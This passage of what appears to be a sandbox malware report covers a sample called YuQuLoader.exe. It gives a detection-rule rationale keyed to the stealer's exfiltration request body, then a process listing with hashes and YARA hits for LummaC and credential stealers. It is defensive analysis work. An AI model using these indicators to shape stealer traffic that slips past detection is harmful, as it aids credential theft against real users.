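          response_capture_complete(RESPONSE_CHUNK_SIZES, RESPONSE_CONTENT_LENGTH))
```

The check deliberately matches on the shape of the body rather than on its values: the uid and hwid are per-victim identifiers and the host and path are per-campaign, so none of them make a durable indicator. The key set uid/cid/hwid is taken from this single capture; confirm it against other samples before turning it into a production rule, and treat the Chrome user agent as corroboration only, since it is a common value.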


                                                                                    Target ID:0
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\YuQuLoader.exe"
                                                                                    Imagebase:0xa90000
                                                                                    File size:1'362'432 bytes
                                                                                    MD5 hash:849C830E2AF83F171E9607E3D2E7F694
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7e2000000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:12:23:24
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\YuQuLoader.exe"
                                                                                    Imagebase:0xa90000
                                                                                    File size:1'362'432 bytes
                                                                                    MD5 hash:849C830E2AF83F171E9607E3D2E7F694
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1558849037.0000000001644000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1557692943.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:12:23:25
                                                                                    Start date:11/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
                                                                                    Imagebase:0xa40000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true
